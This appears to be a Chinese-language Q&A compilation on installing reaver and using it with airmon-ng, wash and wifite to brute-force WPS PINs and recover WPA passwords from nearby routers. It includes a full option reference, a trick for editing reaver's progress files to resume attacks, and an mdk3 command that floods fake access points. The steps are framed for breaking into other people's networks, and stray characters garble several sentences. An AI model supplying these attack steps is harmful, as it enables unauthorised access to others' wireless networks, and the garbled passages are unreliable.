❶ BT5怎麼安裝reaver
可按下面的步驟實施:
首先,通過官網下載reaver;
第二,通過BT5下載得到,可以先保存在桌面;
第三,進行命令執行:
cd /DeskTop
查找軟體,可通過命令ls查看reaver是否存在,存在則打開reaver文件夾
解壓文件:
tar -zxvf /DeskTop/reaver-1.4.tar.gz
進入文件:
cd /reaver-1.4/src
通過命令ls查找configure文件
執行該文件安裝:
./configure
然後通過命令執行:
make && make install
第四,檢查是否安裝成功:
輸入命令:reaver –help
第五,完成reaver安裝
❷ linux reaver怎麼用
需要工具:reaver
原理:窮舉PIN碼以攻灶寬破無線路由器的安全防護
安裝:
下載源碼
從這個網址下載reaver源代碼http://code.google.com/p/reaver-wps
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
解壓
tar-xzvf reaver-1.4.tar.gz
安裝必要的軟體依賴庫和工具
在您編譯reaver前需要先安裝pcaplib等工具,後面還需要aircrack-ng
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
編譯和安裝
配置和編譯Reaver
cd reaver-1.4
cd src
./configure
make
下載aircrack-ng源代碼並編譯
從Ubuntu12.04版本開始aircrack-ng不再被包含在版本軟體倉庫中,不過我們可以從網上下載它的源代碼進行編譯安裝。如果aircrack-ng已經存在,則不必安裝。./configure
make
sudo install
解壓 tar -xzvf reaver-1.4.tar.gz
安裝必要的軟體依賴庫和工具
在您編譯 reaver前需要先安裝 pcaplib等工具,後面還需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
編譯和安裝
配置和編隱彎亮譯 Reaver
cd reaver-1.4 cd src ./configure make
安裝 Reaver
sudo make install
方法:
1 輸入:airmon-ng start wlan0 開啟監聽模式 (屏幕顯示 載入8187L驅動成功–一次就載入成功啊!)
2 輸入:wash -i mon0 -C 查看所有開啟WPS的無線路由 長時間無反應按Ctrl+C,結束進程,這時記下你要PJ的目標路由MAC.
3 輸入:airomp-ng mon0 網卡以混雜模式掃描所有頻道—並顯示所有AP的信息(包括 AP的信號強度,ESSID,MAC,頻道,加密方式,等等…..),按Ctrl+C,結束掃描.
注:如果你已知鬧沖對方無線路由信息 第2,第3步 可省略!
4 輸入:reaver -i mon0 -b MAC -a -S -vv 開始窮舉pin碼
注:隨時可以按CTRL+C退出保存進程,下次按下游標控制鍵「上」鍵然後回車,進程可繼續。
實戰我輸入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只見屏幕飛閃……爽啊!
reaver 參數詳解
必須參數
-i, –interface=<wlan> Name of the monitor-mode interface to use
網卡的監視介面,通常是mon0
-b, –bssid=<mac> BSSID of the target AP
AP的MAC地址
Optional Arguments: 可選參數
-m, –mac=<mac> MAC of the host system
指定本機MAC地址
-e, –essid=<ssid> ESSID of the target AP
路由器的ESSID,一般不用指定
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
信號的頻道,如果不指定會自動掃描
-o, –out-file=<file> Send output to a log file [stdout]
輸出日誌文件
-s, –session=<file> Restore a previous session file
恢復進度文件
-C, –exec=<command> Execute the supplied command upon successful pin recovery
pin成功後執行命令
-D, –daemonize Daemonize reaver
設置reaver成Daemon
-a, –auto Auto detect the best advanced options for the target AP
對目標AP自動檢測高級參數
-f, –fixed Disable channel hopping
禁止頻道跳轉
-5, –5ghz Use 5GHz 802.11 channels
使用5G頻道
-v, –verbose Display non-critical warnings (-vv for more)
顯示不重要警告信息 -vv 可以顯示更多
-q, –quiet Only display critical messages
只顯示關鍵信息
-h, –help Show help
顯示幫助
Advanced Options:高級選項
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
使用指定的4位或者8位pin碼
-d, –delay=<seconds> Set the delay between pin attempts [1]
pin間延時,默認1秒
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
AP鎖定WPS後等待時間
-g, –max-attempts=<num> Quit after num pin attempts
最大pin次數
Reaver 參數
—天天
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
10次意外失敗後等待時間,默認0秒
-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts
每x次pin後等待y秒
-t, –timeout=<seconds> Set the receive timeout period [5]
收包超時,默認5秒
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
M5/M7超時,默認0.2秒
-A, –no-associate Do not associate with the AP (association must be done by another application)
不連入AP(連入過程必須有其他程序完成)
-N, –no-nacks Do not send NACK messages when out of order packets are received
不發送NACK信息(如果一直pin不動,可以嘗試這個參數)
-S, –dh-small Use small DH keys to improve crack speed
使用小DH關鍵值提高速度(推薦使用)
-L, –ignore-locks Ignore locked state reported by the target AP
忽略目標AP報告的鎖定狀態
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
每當收到EAP失敗包就終止WPS進程
-n, –nack Target AP always sends a NACK [Auto]
對目標AP總是發送NACK,默認自動
-w, –win7 Mimic a Windows 7 registrar [False]
模擬win7注冊,默認關閉
Ps:影響到無線的因素很多,所以各參數之間的配合很重要,當然,最關鍵的還是取決於信號。
原理詳細:
什麼是PIN碼?
印在無線路由器設備標簽上的一組8位數字字元串,無線路由器管理界面中當然也會存在並可更改。
PIN碼有什麼用?
在無線網卡的配套管理軟體(如TP-LINK的QSS軟體)里輸入無線路由器設備上的那8位數字字元串就可以成功登錄該已被加密的無線路由器。
窮舉PIN碼是什麼意思?
既然知道了無線路由器PIN值的范圍(8位純數字),且目前大部分設備的WPS是呈開啟狀態的,那麼窮舉PIN碼以攻破無線路由器的安全防護這一暴力行為就有了*理論*可行性
❸ cdlinux下reaver1.4怎麼修改wpc文件
在破解的過程當中並不是每次都能達到效果,還有虛擬機死機、網卡無故掉線等突發事件,這時有的朋友使用的live cd Linux就不能保存pin碼進度,導致從頭開始,雖然是11000個pin碼。。。
今天說說reaver保存的pin碼進度保存文件的修改
reaver1.3版本的mac.wpc是保存在 /etc/reaver/mac.wpc
1.4版:保掘粗餘存在 /usr/local/etc/reaver/mac.wpc
打開wpc文件大家會發現是一些數字排列,判滾這就是reaver pin碼的進度和順序,但對我們有用的只有前三行。
第一行是4位數字是:從何處開始或者已經pin出前四的話,顯示在這里
第二行是3位數字:正在pin後3位(前提是前四已經pin出才會出現)
第三行是1位數字:如果前四已經pin出,後三沒pin出將顯示數字1,2是已經pin出結果
知道了這3行的具體意思,那麼對於上面說的情況就有了用武之地,包括從起、ap關機等
不管是用命令還是圖形,每pin一個在上述目錄中都會形成相應mac的wpc,通過修改每次記錄的幾行數字,可以提高很高的效率
例如:
上次pin到6500,還沒確認前四的情況下,直接修改對應mac的凳源wpc的第一行為6500,他會繼續6500開始pin,但每次要多加幾位數,有時是4有時是6,所以從6500開始不會漏碼
再說pin出前四的情況,這時不用修改wpc,使用命令可以直接確認的前四開始,當然你已經記下了前四
命令:reaver -i mon0 -b mac -p 前四(這個命令還可以-p 8位真實pin碼,應對於對方改了psk,可以直接出密碼)
圖形:只要在開始前勾選-p這個參數 和已知的前四或者8位,一樣的效果
因為每個系統獲取的管理許可權方式不同,所以命令也不一樣,請查看相應的教程,這里說的都是獲得了root許可權下操作的
因為一直不用xiaopan和cdlinux,所以就沒截圖
❹ 過時的wifi破解工具
之前我們講過了fluxion和aircrack破解wifi的方法
其實還有很多的wifi破解方式,不妨都試試。知曉每一個工具的優缺點,在合適的情境下去選擇最適合的方法
不幸的是下面講的這些破解方法基本已經成了古董了,只可遠觀而不可褻玩焉。
因為已經不怎麼管用了...
如果想了解wifi歷史的人可以繼續接著看下去,其他的嘛就快點去看其他文章吧
弄這么多不能用的wifi有什麼用呢?之後我們在知道釣魚wifi的時候會用到,這里我們先講一下
mdk3 wlan1 b -f FakeAPName.txt -c 2
只需要這么一句話
下面開始我的失敗嘗試了,願意看的請留下聽我講述歷史...
其實看看也好,可以避免你們繼續這樣失敗的嘗試,少浪費一些時間
現在路由器防pin真的是防的很好,我pin了至少30次,只pin出來過機房的很老的一台路由器,其他的總是被pin死,看來這11000次也並不想想像中那樣脆弱。這是我做完這次實驗的感受
reaver是通過路由器上一個叫做wps的功能來實現攻擊的,WPS是許多路由器上都有的一個功能,可以為用戶提供簡單的配置過程,它與設備中硬編碼保存的一個PIN碼綁定在帆纖一起。Reaver利用的就是PIN碼的一個缺陷,最終的結果就是,只要有足夠的時間,它就能破解WPA或WPA2的密碼。
根據pin碼破解的原理,可以看到只需要枚舉11000種情況就會必然破解出pin碼,從而通過pin得到wifi密碼。 具體的為什麼是11000種情況呢?
現在開始實現
1.將網卡調到監聽模式
打開終端輸入 airmon-ng start wlan0
2.掃描開啟wps的路由器。
輸入 wash -i wlan0mon
WPS Locked為No的就是開啟wps服務的路由器,都可以嘗試攻擊
3.找到了開啟WPS的wifi,接下來咱們就可以歷燃進行pin碼爆破,下面主要說一下reaver的參數。
reaver 命令:
reaver -i mon0 -b mac -S -v
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
應因狀況調整參數(-c後面都已目標頻道為1作為例子)
選擇之前掃描出來的開啟WPS的wifi,選擇一個進行破解。
輸入: reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4
在窮舉的過程中,reaver會生成以路由mac地址為名的wpc文件,這個文件在kali系統中/etc/reaver/文件夾下。
一時半會pin不出來,過段時間pin的時候命令加參數 -s file.wpc,就會根據之前的進度繼續pin。
最後pin完最後會顯示WPS PIN(正確的pin碼)和WPA PSK(wifi密碼),同時如果WPS功能沒關,pin碼沒修改,無論怎樣修改密碼,都可以通過pin碼獲取wifi密碼: reaver -i wlan0mon -b mac -p pin 碼,來再次得到密碼
一般pin的過快,會把路由器pin死,所以 一般還會加上-d5 -t5參數 ,添加5秒延時,當然數值可以自己改。我添加了也照樣被pin的死死的。不行了這個軟體
很看好他,來試一下
1.打開終端輸入wifite
2.我選擇了all
3.結果一個也沒整出來,他也是用的wps的來破解,現在用wps針對除了很老的路由器,其他的都不是很好辦了
圖形化界面,大家一看就會懂, 先選擇網卡,掃描,破解
說一下主界面的右下角有一個 toolbox工具箱
試試
破解不好用,而且一打開他整個虛擬機都變得有些卡,破解的進度條根本肢轎虛不走
不推薦
我們來試一下他的這些附件
也都不管用,不知道是不是因為使用了https的緣故,反正他現在肯定是out了
參考的一些網站
七夜
freebuf